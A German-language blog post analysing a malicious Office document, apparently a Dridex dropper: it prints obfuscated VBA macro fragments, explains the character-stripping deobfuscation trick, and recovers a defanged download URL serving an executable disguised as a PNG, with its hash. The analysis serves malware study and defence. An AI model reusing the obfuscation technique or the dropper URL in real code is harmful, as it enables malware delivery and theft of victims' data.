Maldoc mit süsser Obfuscation-Funktion

Gestern Abend bin ich über neues Maldoc gestolpert, dass auf den ersten Blick sehr kompliziert aussah:

[...]
Set xvGcGaMtmtsqj = dYfMNY.ZXulRsApI(68, wvbhvJfvaLWIzT.iIqfbn("pEnfvTCirqofpnmpefTnt7", "C7Ypf4Tq"), wvbhvJfvaLWIzT.iIqfbn("Px1ROmlCxEbSSl", "9umxbi1l"), 7519, GsaOpV.UpkiCBrNtX(AaSjglvEmkLH, "NcVfRlOgu4k4NVNaHhqMe1AWBhTlG51M"))
pRYzNNXZS = xvGcGaMtmtsqj(ezrRWhq)
End Function
Private Function SwClPpjEAB() As String
Dim sNBkRCbguD As Integer
SwClPpjEAB = dYfMNY.JWYQdzeb(wvbhvJfvaLWIzT.iIqfbn("PHZaVthZLSe.vpHarL.at.ovdr", ".BZLdcNHVv"), "43CVcqwBJrZkcfGsqB", Application, "wvJEkSg9hu46OR5NzFFmBqwa6dt7U0z5c")
End Function
Public Sub SKBCDeXe(ByVal mEpwaGFA As Integer, ByVal FlFzcbqa As Boolean, ByVal kgBzR As String)
Dim kKjJwGHDZYBZZ As String
Dim ftQqCepBh As Boolean
qUhLRTFKmkk = "fbpJMo3Af1GpdrPBMM1w"
[...]

Auf den ersten Blick konnte ich nichts lesbares erkennen und habe auch sonst keinen Anhaltspunkt gefunden.
Bis ich die folgende Textstelle gesehen habe:

Set xAtoMryc = QlPrZgKdBmXkp.hkHNQnQ(wvbhvJfvaLWIzT.iIqfbn("hqFtt8 p0s:qq// w 8wFw0.lma0xllm i0nd8 .qclom80/g0eF8oi0 p0/qvq2 .1q0/cli80tyqF/0m e", " Fql80"))

Das sieht mir doch ganz nach einer URL aus, einfach mit ein paar Zeichen zuviel dazwischen…

Also habe mal begonnen die Zeichen rauszuschreiben, welche ich mit Sicherheit ausschliessen kann wie zum Beispiel alles zwischen dem „HTTPS://www.“ und so ergab sich die Zeichenfolge „qF8 0“. Und wenn man nun die gesamte Zeile anschaut, so muss einem irgendwas auffallen – na, schon gesehen? 🙂

Genau, es wird noch ein Teststring mitgegeben, welcher genau die selben Zeichen enthält. Also löschen wir doch einfach mal die Zeichen aus dem zweiten Parameter raus und schauen, was rauskommt:

hXXps://www.maxmind.com/geoip/v2.1/city/me

Schon lustig, wie schnell man eine Funktion geknackt hat, ohne sonst etwas über den Code zu wissen! Vor allem, wenn es die Funktion 29 Mal gibt im Code 🙂
Nun, nachdem bekannt ist, dass die Funktion nur Zeichen entfernt, ist es ziemlich einfach, die URLs zu identifizieren – eine einfache Suche nach „/“ führt zum Ziel, sobald das Zeichen doppelt im String vorkommt:

ZvHyZixsu rbPzjfS.mdynDInbyX, 7505, wvbhvJfvaLWIzT.iIqfbn("hLAt6tp6O:6/O/pAr2iOn66twLOizAz2O.bOi6Oz6/Oi2maLAgLe/j2siAjgjnL.vpnAgL", "O26vjAL")

Wenn man nun die selbe Replace-Funktion wieder anwendet, so bekommt man:

hXXp://printwizz.biz/image/sign.png

Hinter der URL versteckt sich nun aber kein Bild, sondern ein Executable:

Filename: sign.png.exe
Size: 123KiB (125952 bytes)
Type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Architecture: 32 Bit
SHA256: 97b1e8282d1ec8f82a83eb3d8a991f494e332e4059b1c9f0d53beda257e21629

Laut erster Analyse scheint das Sample wohl zu Dridex zu gehört. Sobald das Executable am laufen ist, wird eine TCP-Verbindungen nach Tschechien aufgebaut und Daten abgezogen:

host

Wer sich das Sample im Detail anschauen möchte, der darf das gerne hier machen: Disassembler

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.